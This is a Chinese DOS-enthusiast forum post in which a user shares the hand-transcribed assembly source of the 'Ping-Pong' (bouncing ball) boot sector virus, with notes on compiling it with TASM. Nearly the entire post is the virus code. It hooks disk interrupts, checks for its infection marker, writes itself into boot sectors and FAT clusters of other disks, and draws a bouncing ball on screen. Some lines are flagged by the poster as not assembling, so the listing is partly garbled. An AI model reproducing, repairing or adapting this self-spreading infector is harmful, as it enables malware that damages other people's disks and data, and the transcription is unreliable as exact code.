中国DOS联盟

-- 联合DOS 推动DOS 发展DOS --

联盟域名：www.cn-dos.net 论坛域名：www.cn-dos.net/forum
DOS，代表着自由开放与发展，我们努力起来，学习FreeDOS和Linux的自由开放与GNU精神，共同创造和发展美好的自由与GNU GPL世界吧！

游客: 注册 | 登录 | 命令行 | 搜索 | 上传 | 帮助 »

中国DOS联盟论坛 » DOS开发编程 & 发展交流（开发室） » 小球病毒源代码

kickout
高级用户

积分 667
发帖 135
注册 2002-10-25
状态离线

『楼主』: 小球病毒源代码

这可是我在学校时从图书馆里好多好多书里好不容易找到的唯一一个病毒源代码，一个一个字抄在笔记本上，然后再一个一个字符敲进计算机里，要用tasm编译，masm不行。另外可能有些语句不合法，要变通一下。我是在我的计算机老师莫老师的指导下才编译通过的。（巧得很，我的老师也姓莫，和MYS老师同姓，不过他是MJC，呵呵。。。）＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝ cseg segment assume cs:cseg org 7c00h main proc far ;0000:7c00--------- stav: jmp start db 49h, 42h, 4Dh, 20h, 20h,37h, 2Eh, 30h, 00h, 02h, 04h, 01h, 00h db 02h, 00h, 02h, 07h,0A3h,0F8h, 29h, 00h,11h, 00h, 04h, 00h, 11h, 00h, 0FFh,0FFh ;0000:7c1e--------- start: xor ax,ax mov ss,ax mov sp,7c00h mov ds,ax mov ax,ds:[0413h] sub ax,0002h mov word ptr ds:[413h],ax mov cl,06h shl ax,cl sub ax,07c0h ;7c37------------------- mov es,ax mov si,7c00h mov di,si mov cx,0100h repz movsw ; mov cs,ax ; push ax ;let the two line to complish 'mov cs,ax' ; pop cs jmp es:$+2 ;97c0:7c45-------------------- push cs pop ds call comd1 ;7c4a ;7c4a------------- comd1: xor ah,ah int 13 and byte ptr [0:7df8h],80h mov bx,[0:7df9h] push cs pop ax sub ax,0020h mov es,ax call con2 ;7c9d mov bx,[0:7df9h] inc bx mov ax,0ffc0h mov es,ax call con2 ;7c9d xor ax,ax mov [0:7df7h],al mov ds,ax ;7c75--------------------- mov ax,[0:04ch] mov bx,[0:04eh] mov si,word ptr [0:7cd0h] mov word ptr[0:04ch],si ;7cd0 Need register in expression mov [0:04eh],cs push cs pop ds mov [0:7d2ah],ax mov [0:7d2ch],bx mov dl,[0:7df8h] jmp stav ;000:7c00h ;7c98------------------------ con1: mov ax,0301h jmp con21 ;7ca0 ;7c9d--------------- con2: mov ax,0201h ;7ca0----------------- con21: xchg bx,ax add ax,[0:7c1ch] xor dx,dx div word ptr [0:7c18h] inc dl mov ch,dl xor dx,dx div word ptr [0:7c1ah] mov cl,06h shl ah,cl or ah,ch mov cx,ax xchg ch,cl mov dh,dl mov ax,bx ;7cc3----------------- con3: mov dl,[0:7df8h] mov bx,8000h int 13 jnb emd pop ax ;7ccf------------------- emd: ret ;7cd0--------------- push ds push es push ax push bx push cx push dx push cs pop ds push cs pop es ;7cda---------------- test byte ptr [0:7df7h],01h jnz go1 ;7d23 cmp ah,02h jnz go1 ;7d23 cmp [0:7df8h],dl mov [0:7df8h],dl jnz go2 ;7d12 ;7cf0------------------ xor ah,ah int 1ah test dh,7fh jnz go3 ;7d03 test dl,0f0h jnz go3 ;7d03 push dx call show ;7eb3 pop dx ;7d03-------------- go3: mov cx,dx sub dx,[0:7eb0h] mov [0:7eb0h],cx sub dx,+24h jb go1 ;7d23 ;7d12----------------------------- go2: or byte ptr [0:7df7h],01h push si push di call infect ;7d2e ;7d1c----------------- pop di pop si and byte ptr[0:7df7h],0feh ;7d23------------ go1: pop dx pop cx pop dx pop ax pop es pop ds jmp dword ptr [cs:i13] ;c800:051a bios int 13h Illegal number i13:dw 51ah dw 0c800h ;7d2e------------------------------- infect: mov ax,0201h mov dh, 00h mov cx,0001h call con3 ;7cc3 test byte ptr [0:7df8h],80h jz go4 ;7d63 mov si ,81beh mov cx,0004h ;7d46----------------- loop1: cmp byte ptr [si+4],1 jz go5 ;7d58 cmp byte ptr[si+4],4 jz go5 ;7d58 add si,+10h loop loop1 ret ;7d58-------------------------- go5: mov dx,[si] mov cx,[si+2] mov ax,0201h call con3 ;7cc3 ;7d63--------------- go4: mov si,8002h mov di,word ptr[0:7c02h] ;7c02 mov cx,001ch repz movsb ;7d6e------------------------- have infected ? cmp word ptr [0:81fch],1357h jnz go6 ;7d8b cmp byte ptr [0:81f8h],00h jnz go7 ;7d8a mov ax,[0:81f5h] mov [0:7df5h],ax mov si,[0:81f9h] jmp go8 ;7e92 ;7d8a--------------------------- go7: ret ;---------- ;7d8b--------------------------------- go6: cmp word ptr [0:800bh],0200h jnz go7 ;7d8a cmp byte ptr[0:800dh],02h jb go7 ;7d8a mov cx,[0:800eh] mov al,[0:8010h] cbw mul word ptr [0:8016h] add cx,ax mov ax,0020h mul word ptr [0:8011h] add ax,01ffh mov bx,0200h div bx add cx,ax mov [0:7df5h],cx mov ax,[0:7c13h] sub ax,[0:7df5h] mov bl,[0:7c0dh] xor dx,dx xor bh,bh div bx inc ax mov di,ax and byte ptr[0:7df7h],0fbh cmp ax,0ff0h jbe go9 ;7de0 or byte ptr [0:7df7h],04h ;7de0--------------- go9: mov si,0001h mov bx,[0:7c0eh] dec bx mov [0:7df3h],bx mov byte ptr [0:7eb2h],0feh jmp go10 ;7e00 DB 5bh, 03h, 00h, 57h, 13h, 55h,0aah ;7e00----------------- go10: inc word ptr [0:7df3h] mov bx,[0:7df3h] add byte ptr [0:7eb2h],02h call con2 ;7c9d jmp go11 ;7e4b ;7e12--------------------- go16: mov ax,0003h test byte ptr[0:7df7h],04h jz go12 ;7e1d inc ax ;7e1d--------------- go12: mul si shr ax,1 sub ah,[0:7eb2h] mov bx,ax cmp bx,01ffh jnb go10 ;7e00 mov dx,[bx+8000h] test byte ptr [0:7df7h],04h jnz go13 ;7e45 mov cl,04h test si,0001h jz go14 ;7e42 shr dx,cl ;7e42------------------------ go14: and dh,0fh ;7e45----------------- go13: test dx,0ffffh jz go15 ;7e51 ;7e4b------------- go11: inc si cmp si ,di jbe go16 ;7e12 ret ;7e51----------------- go15: mov dx,0fff7h test byte ptr [0:7df7h],04h jnz go17 ;7e68 and dh ,0fh mov cl,04h test si,0001h jz go17 ;7e68 shl dx,cl ;7e68---------------------- go17: or [bx+8000h],dx mov bx,[0:7df3h] call con1 ;7c98 mov ax,si sub ax,0002h mov bl,[0:7c0dh] xor bh,bh mul bx add ax,[0:7df5h] mov si,ax mov bx,0000h call con2 ;7c9d mov bx,si inc bx call con1 ;7c98 ;7e92---------- go8: mov bx,si mov [0:7df9h],si push cs pop ax sub ax,0020h mov es,ax call con1 ;7c98 ;7ea2----------------- push cs pop ax sub ax,0040h mov es,ax mov bx,0000h call con1 ;7c98 ret ;--------------------------------------------- ; 02 22 nop ;7eb3------------------------------------- show: test byte ptr[0:7df7h],02 jnz go18 ;7ede or byte ptr[0:7df7h],02 ;set show mark mov ax,0000h mov ds,ax mov ax,[0:020h] mov bx,[0:022h] lea si,new1c mov word ptr [0:020h],si ;7edf Need register in expression mov [0:022h],cs push cs pop ds mov [0:7fc9h],ax mov [0:7fcbh],bx ;7ede------------- go18: ret ;7edf------------------------------------ new1c: push ds push ax push bx push cx push dx push cs pop ds mov ah,0fh int 10h mov bl,bl cmp bx,[0:7fd4h] jz go19 ;7f27 mov [0:7fd4h],bx dec ah mov [0:7fd6h],ah mov ah,01h cmp bl,07h jnz go20 ;7f05 dec ah ;7f05-------------------------- go20: cmp bl,04h jnb go21 ;7f0c dec ah ;7f0c--------------------- go21: mov [0:7fd3h],ah mov word ptr [0:7fcfh],0101h mov word ptr [0:7fd1h],0101h mov ah,03h push dx mov dx,[0:7fcfh] jmp go22 ;7f4a ;7f27--------------------------- go19: mov ah,03h int 10h int 10h push dx mov ah,02h mov dx,[0:7ecfh] ;[7ECF] OR [7FCF]? int 10h mov ax,[0:7fcdh] cmp byte ptr [0:7fd3h],01h jnz go23 ;7f41 mov ax,8307h ;7f41------------------------- go23: mov bl,ah mov cx,0001h mov ah,09h int 10h ;7f4a---------------------- go22: mov cx,[0:7fd1h] cmp dh,00h jnz go24 ;7f58 xor ch,0ffh inc ch ;7f58------------------------ go24: cmp dh,18h jnz go25 ;7f62 xor ch,0ffh inc ch ;7f62--------------------- go25: cmp dl,00h jnz go26 ;7f6c xor cl,0ffh inc cl ;7f6c----------------------- go26: cmp dl,[0:7fd6h] jnz go27 ;7f77 xor cl,0ffh inc cl ;7f77------------------- go27: cmp cx,[0:7fd1h] jnz go28 ;7f94 mov ax,[0:7fcdh] and al,07h cmp al,03h jnz go29 ;7f8b xor ch,0ffh inc ch ;7f8b------------------- go29: cmp al,05h jnz go28 ;7f94 xor cl,0ffh inc cl ;7f94-------------------------- go28: add dl,cl add dh,ch mov [0:7fd1h],cx mov [0:7fcfh],dx mov ah,02h int 10h mov [0:7fcdh],ax mov bl,ah cmp byte ptr [0:7fd3h],01h jnz go30 ;7fb6 mov bl,83h ;7fb6--------------------- go30: mov cx,0001h mov ax,0907h int 10h pop dx mov ah,02h int 10h pop dx pop cx pop bx pop ax pop ds jmp dword ptr [cs:my] ;f000:fea5 my: dw 0fea5h dw 0f000h DB 00h,03h,4Bh DB 0Dh,0FFh,0FFh,01h,06h,00h,4Fh,0B7h,0B7h,0B7h,0B6h,40h,40h,88h,0DEh,0E6h DB 5Ah,0ACh,0D2h,0E4h,0EAh,0E6h,40h,50h,0ECh,40h,64h,5Ch,60h,52h,40h,40h DB 40h,40h,64h,62h,5Eh,62h,60h,5Eh,70h,6Eh,40h,41h,0B7h,0B7h,0B7h,0B6h ;7fcd----------- main endp cseg ends end stav ＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝看不懂我也没办法，我也忘光了。。。